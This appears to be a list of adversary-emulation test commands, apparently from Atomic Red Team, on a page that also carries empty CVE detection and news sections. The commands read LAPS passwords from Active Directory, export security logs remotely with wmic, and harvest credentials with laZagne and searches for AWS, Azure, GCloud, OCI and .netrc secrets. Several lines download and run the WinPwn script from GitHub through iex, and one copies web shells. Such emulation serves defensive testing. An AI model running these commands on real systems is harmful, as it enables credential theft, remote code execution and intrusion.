Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.